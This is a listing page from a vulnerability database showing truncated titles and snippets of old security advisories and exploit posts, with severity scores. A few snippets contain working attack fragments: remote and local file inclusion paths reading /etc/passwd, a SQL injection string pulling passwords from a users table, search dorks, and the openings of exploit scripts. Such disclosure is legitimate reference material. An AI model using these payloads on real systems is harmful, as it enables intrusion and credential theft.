Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2009/04/13 12:0 a.m.89 views

[SECURITY] [DSA 1770-1] New imp4 packages fix cross-site scripting

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1770-1 [email protected] http://www.debian.org/security/ Steffen Joeris April 13, 2009 http://www.debian.org/security/faq -...

4.3CVSS1.6AI score0.01604EPSS
Exploits1
securityvulns
securityvulns
added 2009/03/24 12:0 a.m.89 views

PostgreSQL DoS

Stack overflow on error message conversion...

4CVSS4.5AI score0.10242EPSS
Exploits2References1Affected Software1
securityvulns
securityvulns
added 2009/03/15 12:0 a.m.89 views

[SECURITY] [DSA 1739-1] New mldonkey packages fix information disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1739-1 [email protected] http://www.debian.org/security/ Florian Weimer March 13, 2009 http://www.debian.org/security/faq -...

5CVSS0.3AI score0.05803EPSS
Exploits0
securityvulns
securityvulns
added 2009/02/10 12:0 a.m.89 views

[BMSA-2009-02] XML injection in PyBlosxom

BLUE MOON SECURITY ADVISORY 2009-02 =================================== :Title: XML Injection in PyBlosxom :Severity: Low :Reporter: Blue Moon Consulting :Products: PyBlosxom v1.4.3 :Fixed in: -- Description ----------- PyBlosxom is a lightweight file-based weblog system. The project started as a...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2008/10/06 12:0 a.m.89 views

CMME Multiple Information disclosure vulnerabilities

WwW.BugReport.ir AmnPardaz Security Research & Penetration Testing Group Title: CMME Multiple Information disclosure vulnerabilities Vendor: http://cmme.oesterholt.net Bug: Information Disclosure Vulnerable Version: 1.19 prior versions also may be affected Exploitation: Remote with browser Exploi...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2008/05/11 12:0 a.m.89 views

SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit

!/usr/bin/perl SazCart = v1.5.1 details&prodid Remote SQL Injection Exploit HomePage: http://www.sazcart.com Discovered & Coded by JosS Contact: sys-projectathotmail.com Spanish Hackers Team / Sys - Project / EspSeC http://www.spanish-hackers.com rgod forever :D Dork: "Powered by SazCart" print...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2008/05/02 12:0 a.m.89 views

[SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1565-1 [email protected] http://www.debian.org/security/ dann frazier May 1, 2008 http://www.debian.org/security/faq -...

7.8CVSS0.1AI score0.02589EPSS
Exploits4
securityvulns
securityvulns
added 2008/04/17 12:0 a.m.89 views

ZDI-08-022: Apple Safari WebKit PCRE Handling Integer Overflow Vulnerability

ZDI-08-022: Apple Safari WebKit PCRE Handling Integer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-022 April 16, 2008 -- CVE ID: CVE-2008-1026 -- Affected Vendors: Apple -- Affected Products: Apple Safari -- TippingPointTM IPS Customer Protection: TippingPoint IPS...

6.8CVSS1.1AI score0.04752EPSS
Exploits1
securityvulns
securityvulns
added 2008/04/15 12:0 a.m.89 views

[NEWS] Websphere MQ MCAUSER Setting Bypass Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

6.6CVSS0.1AI score0.00338EPSS
Exploits0
securityvulns
securityvulns
added 2008/04/10 12:0 a.m.89 views

ZDI-08-021: Adobe Flash Player DeclareFunction2 Invalid Object Use Vulnerability

ZDI-08-021: Adobe Flash Player DeclareFunction2 Invalid Object Use Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-021 April 8, 2008 -- CVE ID: CVE-2007-6019 -- Affected Vendors: Adobe -- Affected Products: Adobe Flash Player -- Vulnerability Details: This vulnerability allows...

9.3CVSS0.7AI score0.5977EPSS
Exploits3
securityvulns
securityvulns
added 2008/04/01 12:0 a.m.89 views

rPSA-2008-0132-1 lighttpd

rPath Security Advisory: 2008-0132-1 Published: 2008-03-31 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: lighttpd=conary.rpath.com@rpl:1/1.4.18-0.5-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-24...

4.3CVSS7.2AI score0.03366EPSS
Exploits1
securityvulns
securityvulns
added 2008/02/24 12:0 a.m.89 views

joomla com_product SQL Injection(catid)

joomla comproduct SQL Injectioncatid AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAL : [email protected] DORK 1 : allinurl:"comproduct"catid DORK 2 : allinurl: EXPLOIT :...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2008/02/20 12:0 a.m.89 views

[email protected], [email protected], [email protected]

Digital Security Research Group DSecRG Advisory DSECRG-08-016 Application: Jinzora Media Jukebox Versions Affected: 2.7.5 Vendor URL: http://www.jinzora.com/ Bugs: Multiple XSS Injections Exploits: YES Reported: 04.02.2008 Second report: 12.02.2008 Vendor response: NONE Date of Public Advisory:...

6.2AI score
Exploits0
securityvulns
securityvulns
added 2007/12/27 12:0 a.m.89 views

Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection

Blakord Portal = Beta 1.3.A all modules Blind Sql Injection. + Info: Software: Blakord Portal HomePage: http://www.cdv3k.com Exploit: Blind Sql Injection High Where: All Modules Bug Found By: JosS / Jose Luis Gуngora Fernбndez Contact: sys-projectathotmail.com Web: http://www.spanish-hackers.com...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2007/12/13 12:0 a.m.89 views

QK SMTP Server DoS

No description provided...

1AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2007/09/26 12:0 a.m.89 views

PostgreSQL dblink library multiple security vulnerabilities

Privilege escalation...

10CVSS2.8AI score0.2613EPSS
Exploits3References1Affected Software1
securityvulns
securityvulns
added 2007/08/21 12:0 a.m.89 views

Checkpoint ZoneAlarm multiple privilege escalations

Vsdatant.sys driver multiple IOCTLs buffer overflows. Weak permissions for executable files...

7.2CVSS4.1AI score0.00367EPSS
Exploits1References3Affected Software1
securityvulns
securityvulns
added 2007/08/16 12:0 a.m.89 views

Cross Site Request Forgery in 2wire routers

Cross Site Request Forgery in 2wire routers Vulnerable Routers: 1701HG, 2071 Gateway Software: v3.17.5, 5.29.51 Password Not Set default Greetz a la Comunidad Underground de Mйxico, y a los que me ayudaron a probarlo: Preth00nker, nitr0us, ... [email protected] I. Background ------------- This is the...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2007/07/13 12:0 a.m.89 views

[Full-disclosure] ActiveWeb Contentserver CMS Clientside Filtering of Page Editor Content

Advisory: ActiveWeb Contentserver CMS Clientside Filtering of Page Editor Content RedTeam Pentesting discovered a design vulnerability in the page editor of the activeWeb contentserver CMS during a penetration test. Filtering of user content, e.g. to prevent the usage of Javascript code, is done ...

4CVSS6.5AI score0.05142EPSS
Exploits1
securityvulns
securityvulns
added 2007/07/05 12:0 a.m.89 views

SAP DB Web Server Stack Overflow

======= Summary ======= Name: SAP DB Web Server Stack Overflow Release Date: 5 July 2007 Reference: NGS00486 Discover: Mark Litchfield [email protected] Vendor: SAP Vendor Reference: SECRES-291 Systems Affected: All Versions Risk: Critical Status: Fixed ======== TimeLine ======== Discovered: 3...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2007/04/12 12:0 a.m.89 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.8CVSS1.5AI score0.08748EPSS
Exploits5References13Affected Software18
securityvulns
securityvulns
added 2007/03/25 12:0 a.m.89 views

Active BuyandSell Remote SQL Injection Vulnerability

Title : Active BuyandSell Remote SQL Injection Vulnerability Author : CyberGhost Demo Page : http://www.activewebsoftwares.com/demoactivebuyandsell Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8 Vuln. Username :...

2.3AI score
Exploits0
securityvulns
securityvulns
added 2007/02/22 12:0 a.m.89 views

LoveCMS 1.4 multiple vulnerabilities

rfi: /lovecms/install/index.php?step=http://site.com/boum.txt? lfi: /lovecms/install/index.php?step=/etc/passwd00 /lovecms/?load=../../../../../../../../../../etc/passwd00 admin upload vuln : upload any kind of file even if it's not accepted it will be stored here : /modules/content/pictures/tmp/...

2.2AI score
Exploits0
securityvulns
securityvulns
added 2007/02/22 12:0 a.m.89 views

Plantilla PHP Simple

Plantilla PHP Simple local file include vulnerability: /zadminxx/listmainpages.php?nfolder=/etc/ file upoad vulnerability: upload any-script with a double extension .. laurent gaffie...

1.9AI score
Exploits0
securityvulns
securityvulns
added 2007/02/14 12:0 a.m.89 views

Microsoft Security Bulletin MS07-016 Cumulative Security Update for Internet Explorer (928090)

Microsoft Security Bulletin MS07-016 Cumulative Security Update for Internet Explorer 928090 Published: February 13, 2007 Version: 1.0 Summary Who Should Read this Document: Customers who use Microsoft Windows Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical...

10CVSS0.4AI score0.60813EPSS
Exploits0
securityvulns
securityvulns
added 2007/01/10 12:0 a.m.89 views

iDefense Security Advisory 01.09.07: Adobe Macromedia ColdFusion Source Code Disclosure Vulnerability

Adobe Macromedia ColdFusion Source Code Disclosure Vulnerability iDefense Security Advisory 01.09.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 09, 2007 I. BACKGROUND Adobe Macromedia ColdFusion is an application server and development framework for websites. More information is...

5CVSS0.2AI score0.12908EPSS
Exploits0
securityvulns
securityvulns
added 2007/01/05 12:0 a.m.89 views

Wordpress <= 2.x dictionnary & Bruteforce attack

Source code !usr/bin/python Flaw found on Wordpress that allow Dictionnary & Bruteforce attack Greetz goes to : NeoMorphS, Tiky Vendor : http://wordpress.org/ Found by : Kad [email protected] / [email protected] import urllib , urllib2, sys, string tab = "sss" string.asciiletters,...

Exploits0
securityvulns
securityvulns
added 2006/12/20 12:0 a.m.89 views

cwmVote 1.0 File Include Vulnerability

cwmVote 1.0 File Include Vulnerability F0und3R: bd0rk || SOH-Crew Website: www.soh-crew.it.tt Download: http://explorer.cwm-design.de/dirs/41/cwmVote.rar Vulnerable Code in archive.php Code: include$abs."inc/functions.inc.php"; include$abs."inc/conf.mysql.inc.php";...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2006/11/22 12:0 a.m.89 views

Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

| | / | / | | | | | / | / / | | | | '| | |/| |/ / / / / | | '| | | / | | || | | | | | | | | / | | | | || |/|| || ||,// / ||| ,|/ ///////////////////////////////////////////////////////////////////////////////////////////////////////////// //Script:Pearl Forums //Author: Dr Max Virus...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2006/11/14 12:0 a.m.89 views

ELOG Web Logbook Remote Denial of Service Vulnerability

ELOG Web Logbook Remote Denial of Service Vulnerability OS2A ID: OS2A1008 Status: 10/31/2006 Issue Discovered 11/08/2006 Reported to the Vendor 11/08/2006 Fixed by Vendor 11/10/2006 Advisory Released Class: Denial of Service Severity: Medium Overview: --------- The Electronic Logbook ELOG is part...

1AI score
Exploits0
securityvulns
securityvulns
added 2006/11/14 12:0 a.m.89 views

UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability

Title : UPublisher 1.0 viewarticle.asp Remote SQL Injection Vulnerability Author : ajann Dork : UPublisher http://target/path//viewarticle.asp?ID=SQL Example: //viewarticle.asp?ID=-120union20select200,password,username,0,0,0,020from20tblusers OR ---...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2006/11/05 12:0 a.m.89 views

Ariadne v2.4 (store_config[code]) Remote File Include Vuln

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ariadne v2.4 storeconfigcode Remote File Include Vuln =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Found: Cyber-Security.Org...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2006/08/21 12:0 a.m.89 views

Sonium Enterprise Adressbook Version 0.2 (folder) RFI

+-------------------------------------------------------------------- + + Sonium Enterprise Adressbook Version 0.2 folder RFI + + Original advisory: + http://www.bb-pcsecurity.de/Websecurity/342/org/SoniumEnterpriseAdressbookVersion0.2folderRFI.htm +...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2006/08/18 12:0 a.m.89 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

1.5AI score
Exploits0References3Affected Software1
securityvulns
securityvulns
added 2006/08/09 12:0 a.m.89 views

[SA21432] Comet WebFileManager "Language" File Inclusion Vulnerability

---------------------------------------------------------------------- Hardcore Disassembler / Reverse Engineer Wanted! Want to work with IDA and BinDiff? Want to write PoC's and Exploits? Your nationality is not important. We will get you a work permit, find an apartment, and offer a relocation...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2006/07/24 12:0 a.m.89 views

SolpotCrew Advisory #2 - Advanced Poll ver 2.02 (base_path) Remote File Inclusion

SolpotCrew Community Advanced Poll ver 2.02 basepath Remote File Inclusion Vendor site : http://www.proxy2.de/scripts.php Bug Found By :Solpot a.k.a k. Hasibuan contact: [email protected] Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt Greetz: choi , cow1seng , Ibnusina ,...

1AI score
Exploits0
securityvulns
securityvulns
added 2006/01/24 12:0 a.m.89 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

1.5AI score
Exploits0References2Affected Software2
securityvulns
securityvulns
added 2004/01/17 12:0 a.m.89 views

Multiple MetaDot Vulnerabilities [ All Versions ]

Vendor : Metadot Corporation URL : http://www.metadot.com Version : MetaDot Portal 5.6.5.4b5 && Earlier All Versions Risk : Multiple Vulnerabilities Description: Metadot is a popular open source portal software GPL recognized for its revolutionary ease-of-use. It provides content management like...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2003/11/14 12:0 a.m.89 views

Web Wiz Forums ver. 7.01

Informations : °°°°°°°°°°°° Language : ASP Bugged Version : Web Wiz Forums ver. 7.01 and less ? Website : http://www.webwizforums.com Problems : Permanent XSS Objects : °°°°°°° - registernewuser.asp - register.asp The values variable are not filtered: strLocation = Request.Form"location" strMessa...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2002/10/03 12:0 a.m.89 views

Multiple Web Security Holes

I sent this three times to webappsec but without resultats. I try so on bugtraq, although that is less appropriate. ----------------------------------------------------- Five products in PHP are vulnerable to various holes. 1 TightAuction Website : http://www.tightprices.com Tested Version : 3.0...

7AI score
Exploits0
securityvulns
securityvulns
added 2002/02/27 12:0 a.m.89 views

BadBlue Yet Another Directory Traversal

Strumpf Noir Society Advisories ! Public release ! -- -= BadBlue Yet Another Directory Traversal =- Release date: Tuesday, February 26, 2002 Introduction: BadBlue is the technology behind Working Resources Inc.'s product line with the same name and which, amongst other things, also powers...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2001/11/14 12:0 a.m.89 views

Re: More problems with RADIUS (protocol and implementations)

I note that the original message didn't cite my short message to Bugtraq about security issues with RADIUS: http://cert.uni-stuttgart.de/archive/bugtraq/2000/12/msg00332.html Some points in that message were also covered by Joshua, he added a number of good points, and missed a few others...

1.1AI score
Exploits0
securityvulns
securityvulns
added 2001/02/14 12:0 a.m.89 views

RFP2101: RFPlutonium to fuel your PHP-Nuke

-----/ RFP2101 /-------------------------------/ rfp.labs / wiretrip/---- RFPlutonium to fuel your PHP-Nuke SQL hacking user logins in PHP-Nuke web portal ------------------------------------/ rain forest puppy / [email protected] Table of contents: -/ 1 / Standard advisory information -/ 2 / High...

7.5CVSS7.2AI score0.1207EPSS
Exploits3
securityvulns
securityvulns
added 2000/12/02 12:0 a.m.89 views

Security Bulletin MS00-092

The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. -----BEGIN PGP SIGNED MESSAGE----- - ------------------------------------------------------------ Issue: Buffer overrun...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2000/03/30 12:0 a.m.89 views

<Антивирус Касперского> получает сертификат Trojan Checkmark

Пресс Релиз Антивирус Касперского получает сертификат Trojan Checkmark Первый российский антивирус гарантированно защищает пользователей от Троянских коней! "Лаборатория Касперского" www.avp.ru, российский лидер в области разработки антивирусных систем безопасности, сообщает, что ее продукты для...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2015/10/26 12:0 a.m.88 views

CVE-2015-7319 - SQL Injection in Appointment Booking Calendar 1.1.7 WordPress plugin

Vulnerability title: SQL Injection in Appointment Booking Calendar 1.1.7 WordPress plugin CVE: CVE-2015-7319 Vendor: WordPress DWBooster Product: Appointment Booking Calendar Affected version: 1.1.7 Fixed version: 1.1.8 Reported by: Ibйria Medeiros Vulnerability Details: ===================== It...

7.5CVSS1.9AI score0.02433EPSS
Exploits1
securityvulns
securityvulns
added 2015/07/13 12:0 a.m.88 views

[SECURITY] [DSA 3306-1] pdns security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3306-1 [email protected] https://www.debian.org/security/ Alessandro Ghedini July 09, 2015 https://www.debian.org/security/faq -...

7.8CVSS2.2AI score0.81834EPSS
Exploits0
securityvulns
securityvulns
added 2015/06/13 12:0 a.m.88 views

PHP multiple security vulnerabilities

NULL character injection, DoS, integer overflow, memory corruption...

7.5CVSS2.9AI score0.50129EPSS
Exploits4References2Affected Software1
securityvulns
securityvulns
added 2015/06/01 12:0 a.m.88 views

[security bulletin] HPSBGN03286 rev.1 - HP LoadRunner, Buffer Overflow

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04594015 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04594015 Version: 1 HPSBGN03286 rev....

10CVSS0.3AI score0.10867EPSS
Exploits0
securityvulns
securityvulns
added 2015/05/12 12:0 a.m.88 views

Reflected Cross-Site Scripting vulnerability in asdoc generated documentation

------------------------------------------------------------------------ Reflected Cross-Site Scripting vulnerability in asdoc generated documentation ------------------------------------------------------------------------ Radjnies Bhansingh, March 2014...

0.5AI score
Exploits0
Total number of security vulnerabilities5000